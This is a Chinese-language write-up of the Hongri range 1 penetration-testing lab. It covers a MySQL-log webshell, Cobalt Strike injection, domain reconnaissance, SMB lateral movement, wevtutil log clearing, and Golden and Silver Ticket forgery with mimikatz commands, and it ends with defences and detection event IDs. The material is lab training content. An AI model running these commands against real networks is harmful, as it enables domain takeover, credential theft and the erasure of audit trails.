红日靶场1
web渗透
查看日志文件:show variables like '%general%';
日志的目录为C:\phpStudy\MySQL\data\stu1.log
修改位置:set global general_log_file="C:\phpStudy\WWW\shell.php"
修改读写功能:set global general_log="On"
写入一句话木马select '' 让日志中能有改记录,然后用蚁剑连接该日志。拿到shell
内网攻击
先关闭防火墙:netsh advfirewall set allprofiles state off
CS上传exe ./teamserver ip 密码
上传成功之后用ps命令查看pid
因为容易被删且不会开机自启动,所以需要转移exe文件
inject 进程号
kill 旧进程号
信息收集
getuid 查看账号信息,发现是域管理员
getsystem提权,变成系统管理员
遇到问题:net view 之后只看到两个主机,理论上有三台?
shell ipconfig/all 查看域是哪后缀
shell net view /domain查看有哪些域
shell net group "domain controllers" /domain 查看域主机名
主机名为owa,ip为192.168.52.138
横向移动
扫描端口
发现都开了445端口(SMB)
创建一个SMB监听器,然后抓起明文密码
选择要横向移动的机器
``
| 项目 | 含义 | 用途 |
|---|---|---|
| GOD | NetBIOS 短域名 | SMB、NTLM、横向移动 |
| GOD.ORG | 完整 DNS 域名 | Kerberos、AD 查询 |
完成之后清理痕迹
shell wevtutil cl security
shell wevtutil cl system
shell wevtutil cl application
shell wevtutil cl "windows powershell"
shell wevtutil cl Setup
黄金票据
Kerberos协议
三个过程大致的描述:
Client 上的用户请求KDC上的AS服务TGT
Client 使用TGT请求KDC上的TGS得到ST(TGS ticket)
Client使用ST(TGS Ticket)访问Server
三个过程中涉及到的加密:
Client的用户请求AS使用的是用户对应的哈希加密
AS向Client返回两段内容,第一段内容是对应用户加密的(Ticket-Granting-Ticket,TGT) ,第二段内容是TGS 密钥加密的TGT(Ticket-Granting-Ticket)
Client向TGS发送两段内容,第一段内容为主体为TGT,第二段内容为(Ticket-Granting-Ticket)加密的Authenticator 1 {Client ID, Timestamp}。
TGS返回Client两段内容,第一段内容为[Service密钥]加密的Client-To-Server Ticket,使用[Client/TGS SessionKey]加密的[Client/Server SessionKey]。
Client向Service server 发送两段内容,第一段内容为Client-To-Server Ticket(未解密),由[Client/Server SessionKey]加密的Authenticator 2
如果正确,Service Server返回[Client/Server SessionKey]加密的Timestamp信息)
整个过程中的Ticket-Granting-Ticket和Client-To-Server Ticket就是我们所说的黄金票据(Golden Ticket)和白银票据(Silver Ticket)
上面所说的TGS 密钥来源于AD上的一个特殊账户,该账户是KDC 的服务账户,系统自动分配密码,该账户会在 AD 安装时自动创建krbtgt,该账户默认禁用,不能用于交互式登录到域,也无法重命名
黄金票据
1、原理
黄金票据就是伪造krbtgt用户的TGT票据,krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户
利用前提:
拿到域控(没错就是拿到域控QAQ),适合做权限维持
有krbtgt用户的hash值(aeshash ntlmhash等都可以,后面指定一下算法就行了)
条件要求:
域名
域的SID 值
域的KRBTGT账户NTLM密码哈希
伪造用户名
2、利用
(1)获取信息
1、获取域名
whoami
net time /domain
ipconfig /all
2、获取SID
whoami /all
3、获取域的KRBTGT账户NTLM密码哈希或者aes-256值
用mimikatz
lsadump::dcsync /domain:zz.com /user:krbtgt /csv
4、伪造管理员用户名
net group "domain admins"
(2)伪造TGT
1、清除所有票据
klist purge
2、使用mimikatz伪造指定用户的票据并注入到内存
kerberos::golden /admin:administrator /domain:zz.com /sid:S-1-5-21-1373374443-4003574425-2823219550 /krbtgt:9f3af6256e86408cb31169871fb36e60 /ptt
3、防御
防御措施如下:
- 限制域管理员登录到除域控制器和少数管理服务器以外的任何其他计算机(不要让其他管理员登录到这些服务器)将所有其他权限委派给自定义管理员组。这大大降低了攻击者访问域控制器的Active Directory的ntds.dit。如果攻击者无法访问AD数据库(ntds.dit文件),则无法获取到KRBTGT帐户密码
- 禁用KRBTGT帐户,并保存当前的密码以及以前的密码。KRBTGT密码哈希用于在Kerberos票据上签署PAC并对TGT(身份验证票据)进行加密。如果使用不同的密钥(密码)对证书进行签名和加密,则DC(KDC)通过检查KRBTGT以前的密码来验证
- 建议定期更改KRBTGT密码(毕竟这是一个管理员帐户)。更改一次,然后让AD备份,并在12到24小时后再次更改它。这个过程应该对系统环境没有影响。这个过程应该是确保KRBTGT密码每年至少更改一次的标准方法
- 一旦攻击者获得了KRBTGT帐号密码哈希的访问权限,就可以随意创建黄金票据。通过快速更改KRBTGT密码两次,使任何现有的黄金票据(以及所有活动的Kerberos票据)失效。这将使所有Kerberos票据无效,并消除攻击者使用其KRBTGT创建有效金票的能力
白银票据
1、原理
黄金票据是伪造TGT(门票发放票),而白银票据则是伪造ST(门票),这样的好处是门票不会经过KDC,从而更加隐蔽,但是伪造的门票只对部分服务起作用,如cifs(文件共享服务),mssql,winrm(windows远程管理),DNS等等
利用前提:
拿到目标机器hash(是目标机,不一定是域控)
条件要求:
域名
域sid
目标服务器FQDN
可利用的服务
服务账号的NTML HASH
需要伪造的用户名
服务列表
2、利用
(1)信息收集
1、获取域名
whoami
net time /domain
ipconfig /all
2、获取SID
whoami /all
3、目标机器的FQDN
net time /domain
就是hostname+域名 /target:\WIN-75NA0949GFB.NOONE.com
4、可利用的服务CIFS(磁盘共享的服务)
/service:CIFS
5、要伪造的用户名
/user:Administrator
6、服务账号的ntlm hash(Primary Username : WIN-75NA0949GFB
带
的hash,不是admin的)
/rc4:08d93ddf15a6309a46daaa7ec8565296
生成了mimikatz.log文件(域控主机执行
7、利用文件共享服务cifs,获取服务账号得NTMLhash值(在14068基础上使用mimikatz获取)
注意:服务账号就是域控名$
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit >> 2.txt
(2)伪造ST
1、清除所有票据
klist purge
2、使用mimikatz伪造指定用户的票据并注入到内存
kerberos::golden /domain:域名 /sid:填sid /target:完整的域控名 /service:cifs /rc4:服务账号NTMLHASH /user:用户名 /ptt
结语
简单了解黄金票据和白银票据:
黄金票据:是直接抓取域控中ktbtgt账号的hash,来在client端生成一个TGT票据,那么该票据是针对所有机器的所有服务。
白银票据:实际就是在抓取到了域控服务hash的情况下,在client端以一个普通域用户的身份生成TGS票据,并且是针对于某个机器上的某个服务的,生成的白银票据,只能访问指定的target机器中指定的服务。
检测的话可以参考:Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory
Golden Ticket 和Silver Ticket都会在日志,不同的是,Golden Ticket会在域控中留下日志,Silver Ticket 仅在目标系统留下日志,因为Silver Ticket 不与KDC产生交互
产生的日志中,应该关注事件ID 4624(账户登录)、4634(账户注销)、4672(管理员登录),并且域字段应该为Domain 时为空